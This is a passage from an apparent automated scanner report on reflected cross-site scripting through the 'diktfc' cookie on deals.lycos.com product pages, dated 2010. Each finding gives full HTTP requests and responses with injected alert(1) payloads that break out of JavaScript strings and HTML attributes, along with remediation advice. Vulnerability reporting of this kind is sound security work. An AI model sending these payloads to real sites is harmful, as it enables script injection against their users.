Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8753a"><script>alert(1)</script>f676558b74c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8753a"><script>alert(1)</script>f676558b74c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.240. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fe7f"%3balert(1)//d72ebf3820a was submitted in the diktfc cookie. This input was echoed as 1fe7f";alert(1)//d72ebf3820a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fe7f"%3balert(1)//d72ebf3820a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fe7f";alert(1)//d72ebf3820a"
});
</script>
...[SNIP]...

1.241. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 298cd"%3balert(1)//2c40b7b6bb2 was submitted in the diktfc cookie. This input was echoed as 298cd";alert(1)//2c40b7b6bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298cd"%3balert(1)//2c40b7b6bb2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
avascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298cd";alert(1)//2c40b7b6bb2"
});
</script>
...[SNIP]...

1.242. http://deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b34d0"><script>alert(1)</script>e18b336f5a9 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab34d0"><script>alert(1)</script>e18b336f5a9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
c="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab34d0"><script>alert(1)</script>e18b336f5a9&amp;cj=1" alt="tracker" />
...[SNIP]...

1.243. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sony-14mp-nex-5-dslr-w-lens-654-413823

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46fb"%3balert(1)//caa31ca79e7 was submitted in the diktfc cookie. This input was echoed as b46fb";alert(1)//caa31ca79e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/sony-14mp-nex-5-dslr-w-lens-654-413823 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab46fb"%3balert(1)//caa31ca79e7; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:25 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab46fb";alert(1)//caa31ca79e7"
});
</script>
...[SNIP]...

1.244. http://deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sony-14mp-nex-5-dslr-w-lens-654-413823

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc337"><script>alert(1)</script>e5f7290f0d7 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/sony-14mp-nex-5-dslr-w-lens-654-413823 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abc337"><script>alert(1)</script>e5f7290f0d7; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abc337"><script>alert(1)</script>e5f7290f0d7&amp;cj=1" alt="tracker" />
...[SNIP]...

1.245. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19f39"%3balert(1)//768516f1e93 was submitted in the diktfc cookie. This input was echoed as 19f39";alert(1)//768516f1e93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A19f39"%3balert(1)//768516f1e93; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
avascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A19f39";alert(1)//768516f1e93"
});
</script>
...[SNIP]...

1.246. http://deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76cf0"><script>alert(1)</script>f4b8c206198 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A76cf0"><script>alert(1)</script>f4b8c206198; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
c="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A76cf0"><script>alert(1)</script>f4b8c206198&amp;cj=1" alt="tracker" />
...[SNIP]...

1.247. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/toshiba-camileo-1080p-digital-camcorder-89-414580

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201be"%3balert(1)//8d2c55d7ace was submitted in the diktfc cookie. This input was echoed as 201be";alert(1)//8d2c55d7ace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/toshiba-camileo-1080p-digital-camcorder-89-414580 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A201be"%3balert(1)//8d2c55d7ace; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A201be";alert(1)//8d2c55d7ace"
});
</script>
...[SNIP]...

1.248. http://deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/toshiba-camileo-1080p-digital-camcorder-89-414580

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d968"><script>alert(1)</script>3e8a43ed830 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/toshiba-camileo-1080p-digital-camcorder-89-414580 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d968"><script>alert(1)</script>3e8a43ed830; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d968"><script>alert(1)</script>3e8a43ed830&amp;cj=1" alt="tracker" />
...[SNIP]...

1.249. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/unlocked-mytouch-4g-smartphone-for-440-414260

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf004"><script>alert(1)</script>d27db054aad was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/unlocked-mytouch-4g-smartphone-for-440-414260 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abf004"><script>alert(1)</script>d27db054aad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:49 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abf004"><script>alert(1)</script>d27db054aad&amp;cj=1" alt="tracker" />
...[SNIP]...

1.250. http://deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/unlocked-mytouch-4g-smartphone-for-440-414260

Issue detail

